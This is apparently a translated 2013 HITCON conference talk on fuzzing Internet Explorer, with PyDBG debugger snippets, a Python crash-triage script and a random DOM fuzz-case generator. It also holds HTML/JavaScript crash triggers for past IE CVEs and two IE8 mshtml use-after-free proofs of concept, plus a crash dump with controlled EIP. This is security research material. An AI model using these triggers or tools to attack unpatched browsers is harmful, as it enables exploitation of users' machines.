0-Day Easy Talk: Happy Fuzzing Internet Explorer. 2013/07/19 @ HITCON <Orange@chroot.org>
0-Day WTF Talk: Happy Fuzzing Internet Explorer. 2013/07/19 @ HITCON <Orange@chroot.org>
This is an easy talk.
Sharing some of my fuzzing experience,
and, in passing, dropping a 0-day.
Hello, everyone.
This is Orange speaking.
Currently a college student.
Member of CHROOT.org.
Working part-time at DevCo.re.
Disclosed some vulnerabilities: CVE-2013-0305, CVE-2012-4775 (MS12-071).
About Me: 蔡政達 aka Orange. 2009 HITCON (Taiwan hacker conference) contest champion. 2011, 2012 National Information Security Contest (Golden Shield Award) champion. 2011 speaker at AVTOKYO, Tokyo. 2012 speaker at VXRLConf, Hong Kong. Speaker at Taiwan PHPConf, WebConf, PyConf. Specialties: hacking techniques, Web security, Windows vulnerability exploitation.
If you are interested in me, you can visit blog.orange.tw
I focus on / am interested in Web security and network penetration.
But today let's talk about 0-days and fuzzing (not my area of expertise QQ, I am just sharing).
Conference-Driven 0-Day, n. Definition: a 0-day produced for a conference.
Some notes from hunting 0-days.
This time we talk about IE.
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zerodays-an-price-list-for-hackers-secret-software-exploits/
Hacker's Good Friend
Methods: White Box: code review (IE5.5 source code), or throw it straight into IDA. Black Box: fuzzing.
Fuzzing: garbage in, garbage out. In theory it can find every vulnerability, provided you have infinite time.
"More time, more 0-days." - Barack Obama
Fuzzing Model: Generator, Logger, Result, Debugger
http://youtube.com/watch?v=m7xg-ynmise
Debugger: the Windows Debug API (DebugActiveProcess, WaitForDebugEvent, ContinueDebugEvent) is too much hassle. We want a fast, customizable debugger.
PyDBG: A Pure Python Windows Debugger Interface
Debug a Process
  >>> from pydbg import *            # pydbg() is a class inside the pydbg package
  >>> dbg = pydbg()
  >>> dbg.load( file )               # or dbg.attach( pid )
  >>> dbg.run()
Set Breakpoint
  >>> dbg.bp_set( address, handler=callback )        # software breakpoint; the callback receives the pydbg object
  >>> dbg.set_callback( exception_code, callback )   # e.g. EXCEPTION_ACCESS_VIOLATION from pydbg.defines
Memory Manipulation
  >>> dbg.read( address, length )
  >>> dbg.write( address, data )     # pydbg.write takes the bytes to write, not a length
Crash Dump Report
  >>> import utils                   # paimei's utils package
  >>> bin = utils.crash_binning.crash_binning()
  >>> bin.record_crash( dbg )        # call this from the access-violation callback
  >>> bin.crash_synopsis()
Logger (Filter): mountains of crashes. Not every crash can become an exploit; over 90% are null-pointer dereferences, usable only for DoS (mov eax, [ebx+0x70] ; ebx = 0). What to check: EIP, the disassembly at EIP (jmp reg, call reg, call [reg + CONST]), the stack, the SEH chain.
EIP = ffffffff!!?
0x50000 = 327680 = (65535 / 2)*10. The value 65535 is the one we can control.
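The Logger slide describes the filter by hand: drop the null-pointer crashes, keep the ones where EIP or an indirect branch looks controllable. The following is an added example (not code from the talk or from paimei) of that triage step in Python. It assumes each crash has been reduced to the faulting instruction plus a WinDbg-style register line; the sample records are constructed, except that the second one reuses the register values quoted on the "Call Stack" slide.

```python
import re

# Constructed sample crash records in a WinDbg-like shape: the faulting
# instruction plus a register dump. The second record reuses the register
# values quoted on the "Call Stack" slide; the others are made up for this demo.
SAMPLE_CRASHES = [
    {"insn": "mov eax,dword ptr [ebx+70h]",          # the slide's null-pointer case
     "regs": "eax=00000000 ebx=00000000 ecx=037f12c8 edx=00000000 "
             "esi=0172b130 edi=00000000 eip=6a0c1f30 esp=0172b100 ebp=0172b11c"},
    {"insn": "call edx",                              # the slide's 'call edx' crash
     "regs": "eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 "
             "esi=0172b130 edi=00000000 eip=085d8b53 esp=0172b100 ebp=0172b11c"},
    {"insn": "mov dword ptr [esi+0Ch],ecx",           # write through a fuzz-pattern pointer
     "regs": "eax=00000000 ebx=0019bb30 ecx=00000001 edx=00000000 "
             "esi=41414141 edi=00000000 eip=6a0c2200 esp=0172b100 ebp=0172b11c"},
    {"insn": "???",                                   # EIP = ffffffff, nothing to disassemble
     "regs": "eax=00050000 ebx=0019bb30 ecx=00000000 edx=00000000 "
             "esi=0172b130 edi=00000000 eip=ffffffff esp=0172b100 ebp=0172b11c"},
]

GPR = r"(eax|ebx|ecx|edx|esi|edi|ebp|esp|eip)"
REG_RE = re.compile(GPR + r"=([0-9a-f]{8})", re.I)
BRANCH_RE = re.compile(r"^(jmp|call)\s+(?:dword ptr\s+)?\[?\s*" + GPR)  # jmp reg / call reg / call [reg+c]
MEM_RE = re.compile(r"\[\s*" + GPR)                                      # base register of a memory operand
NULL_PAGE_END = 0x10000   # the lowest 64 KiB of a Win32 process is never mapped

def parse_regs(dump):
    """Turn a WinDbg register dump into {name: int}."""
    return {name.lower(): int(value, 16) for name, value in REG_RE.findall(dump)}

def triage(crash):
    """Classify one crash record as (category, detail)."""
    regs = parse_regs(crash["regs"])
    insn = crash["insn"].strip().lower()
    eip = regs.get("eip", 0)

    # 1. EIP outside anything mappable: control flow has already left the program.
    if eip < NULL_PAGE_END or eip >= 0xFFFF0000:
        return ("eip-invalid", "eip=%08x" % eip)

    # 2. The branch target came from a register, so it may be input-influenced data.
    m = BRANCH_RE.match(insn)
    if m:
        kind, reg = m.group(1), m.group(2)
        return ("indirect-branch", "%s via %s=%08x" % (kind, reg, regs.get(reg, 0)))

    # 3. A memory operand: is the base register near NULL, and is it a read or a write?
    m = MEM_RE.search(insn)
    if m:
        reg = m.group(1)
        base = regs.get(reg, 0)
        # Intel syntax is "op dst,src": a '[' before the comma means the memory operand
        # is written. Single-operand forms are treated as reads here (approximation).
        access = "write" if "," in insn and insn.index("[") < insn.index(",") else "read"
        if base < NULL_PAGE_END:
            return ("null-deref", "%s via %s=%08x (DoS only)" % (access, reg, base))
        return ("invalid-%s" % access, "%s via %s=%08x" % (access, reg, base))

    return ("unknown", insn)

PRIORITY = ["eip-invalid", "indirect-branch", "invalid-write", "invalid-read", "null-deref", "unknown"]

def rank(crashes):
    """Order crash records so the ones worth a human's time come first."""
    return sorted((triage(c) for c in crashes), key=lambda r: PRIORITY.index(r[0]))

if __name__ == "__main__":
    for category, detail in rank(SAMPLE_CRASHES):
        print("%-16s %s" % (category, detail))
```

The ordering encodes the slide's rule of thumb: a garbage EIP or an indirect branch through a register is looked at first, an invalid write before an invalid read, and the null-page dereferences (the 90% DoS-only pile) last. In a real harness the instruction and register line would come from the debugger callback rather than from the constructed list.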
File Generator: the most important part of fuzzing.
File Generator: the weirder the content the better, but it still has to conform to the spec. Read the spec thoroughly, know the file structure. Imagination is your superpower.
Fuzzing directions: 1) look for new types of vulnerabilities (laborious but generalizable); 2) look for known types of vulnerabilities (fast but targeted).
New types of vulnerabilities: try newer or less-used features: HTML5 Canvas, SVG, VML (CVE-2013-2551 / VML integer overflow / Pwn2Own / VUPEN), WebGL (IE11 begins to support it).
Known types of vulnerabilities: from studying past bugs we know Internet Explorer is not good at parsing the DOM tree: parsing <TABLE> with <TR> & <TD>, parsing <TABLE> with <COL>, CTreeNode & CTableLayout.
Pseudo Scenario of Use-After-Free
  <foo>
    <bla id=x>
      <bar id=y>
      </bar>
    </bla>
  </foo>
  <script>
    var x = document.getElementById('x');
    var y = document.getElementById('y');
    x.innerHTML = 'AAAA';      // replaces the subtree that y belongs to, freeing y's node
    y.style.width = '100px';   // the slide writes this step as pseudocode (y.length = 100px): touch the freed node
  </script>
Ex: CVE-2011-1260 (Not Full Version)
  <body>
  <script>
    document.body.innerHTML += "<object>TAG_1</object>";
    document.body.innerHTML += "<a id='tag_3' style=' '>TAG_3</a>";
    document.body.innerHTML += "AAAAAAA";
    document.body.innerHTML += "<strong style=' '>TAG_11</strong>";
  </script>
  </body>
Ex: CVE-2012-1876 (Heap Overflow)
  <script> setTimeout("trigger();", 1); </script>
  <TABLE style="table-layout: fixed; ">
    <col id="132" width="41" span="1"> </col>
    </col>
  </TABLE>

  function trigger() {
    var obj_col = document.getElementById("132");
    obj_col.width = "42765";
    obj_col.span = 1000;
  }
Fuzzing with the DOM Tree: use DOM methods to manipulate objects: createElement, removeChild, appendChild, innerHTML, outerText, createRange, addEventListener, select. https://www.facebook.com/zztao
Putting It All Together: 1) randomize the HTML nodes of the initial document; 2) manipulate the nodes with DOM methods (can also play with CSS at the same time).
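The two steps above (random initial node tree, then DOM-method manipulation with some CSS mixed in) are the whole generator design. The block below is an added example of such a generator in Python; it is not the talk's own fuzzer, whose code the slides do not show. The tag pool, CSS pool and manipulation templates are my assumptions, built from the elements and DOM methods the slides name. Every case embeds its seed so that a crash found by the harness can be regenerated exactly.

```python
import random

# Tag pool: the table-related elements the slides single out as IE's weak spot, plus fillers.
TAG_POOL = ["table", "tr", "td", "th", "col", "span", "a", "q", "legend", "div"]
CSS_POOL = ["table-layout: fixed", "display: inline", "position: absolute", "float: left"]

# Manipulations built from the DOM methods listed on the slides. {t} is replaced by a
# lookup of a random element, {v} by a random number, {tag} by a random tag name.
OP_POOL = [
    "{t}.innerHTML = 'AAAA';",
    "{t}.outerText = '';",
    "{t}.parentNode.removeChild({t});",
    "document.body.appendChild({t});",
    "{t}.appendChild(document.createElement('{tag}'));",
    "{t}.style.width = '{v}px';",
    "{t}.addEventListener('DOMNodeRemoved', function () {{ {t}.innerHTML = ''; }}, false);",
]
MAX_DEPTH = 4   # bound on nesting so a case stays small enough to reduce by hand

def gen_tree(rng, ids, depth=0):
    """Build one random element (recursively) and record its id in ids."""
    tag = rng.choice(TAG_POOL)
    eid = "e%d" % len(ids)
    ids.append(eid)
    attrs = ' id="%s"' % eid
    if rng.random() < 0.3:                       # step 2's "play with CSS at the same time"
        attrs += ' style="%s"' % rng.choice(CSS_POOL)
    children = ""
    if depth < MAX_DEPTH:
        children = "".join(gen_tree(rng, ids, depth + 1) for _ in range(rng.randint(0, 3)))
    return "<%s%s>%s</%s>" % (tag, attrs, children or "X", tag)

def build(seed, n_ops=8):
    """Return {'html', 'ids', 'ops'} for one fuzz case; the same seed always yields the same case."""
    rng = random.Random(seed)
    ids = []
    tree = gen_tree(rng, ids)                    # step 1: random initial node tree
    ops = []
    for _ in range(n_ops):                       # step 2: manipulate nodes with DOM methods
        target = "document.getElementById('%s')" % rng.choice(ids)
        op = rng.choice(OP_POOL).format(t=target, v=rng.randint(0, 65535), tag=rng.choice(TAG_POOL))
        ops.append("try { %s } catch (e) {}" % op)   # keep going when a node is already gone
    script = "window.onload = function () {\n  %s\n};" % "\n  ".join(ops)
    html = ("<!DOCTYPE html>\n<!-- seed: %d -->\n<html><body>\n%s\n<script>\n%s\n</script>\n"
            "</body></html>\n" % (seed, tree, script))
    return {"html": html, "ids": ids, "ops": ops}

if __name__ == "__main__":
    import sys
    seed = int(sys.argv[1]) if len(sys.argv) > 1 else 1
    sys.stdout.write(build(seed)["html"])
```

Usage: `python gen.py 42 > case_42.html`, then hand the file to the debugger loop. The try/catch around each manipulation matters in practice: after a removeChild the next getElementById returns null, and without it the script would stop at the first exception and the later manipulations would never run.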
"Bad luck is a character problem." - Barack Obama
Generally, a single machine run can find 1 or 2 IE 0-days in a month. I have successfully found 0-days from IE6 to IE9; for IE10+ I haven't tried because I am too lazy :(
So I found a 0-day for HITCON: 1) works on Internet Explorer 8; 2) mshtml.dll 8.0.6001.23501
http://www.zdnet.com/ie8-zero-day-flaw-targets-u-s-nuke-researchers-all-versionsof-windows-affected-7000014908/
WinXP can fight on for another ten years.
Proof-of-Concept
  <html>
  <script>
    var x = document.getElementById('eee');
    x.innerHTML = '';
  </script>
  <body>
    <table> </table>
  </body>
  </html>
Microsoft is our sponsor. I can't say more detail until it is patched :(
Call Stack
call edx
(e10.950): Access violation - code c0000005 (!!! second chance !!!)
eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 esi=0172b130 edi=00000000
eip=085d8b53 esp=0172b100 ebp=0172b11c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
085d8b53 ??              ???
Writing Exploit. Windows protections: DEP. Luckily, if it is Windows XP we don't care about ASLR. Luckily it is not IE10+, so there is no vtable guard.
So, writing the exploit is easy: heap spray + ROP is enough.
Demo
http://youtube.com/watch?v=qwkkfucq_va
Originally, this story had a happy ending.
But... the most exciting part of life is this "but".
The 0-day was silently fixed a week before HITCON.
What the
Proof-of-Concept
  <!DOCTYPE html>
  <table>
    <tr><legend><span>
      <q id='e'>
        <a align="center"> <th> O </th> </a>
      </q>
    </span></legend></tr>
  </table>
  </html>

  window.onload = function () {
    var x = document.getElementById('e');
    x.outerText = '';
  }
Works on mshtml.dll:
  mshtml.dll ...               # 2013/05/14
  mshtml.dll 8.0.6001.23501    # 2013/06/11
  mshtml.dll 8.0.6001.23507    # 2013/07/09
Reference: VUPEN Blog http://www.vupen.com/blog/ ; Paimei https://github.com/openrce/paimei . Special thanks: tt & nanika
Thanks <Orange@chroot.org>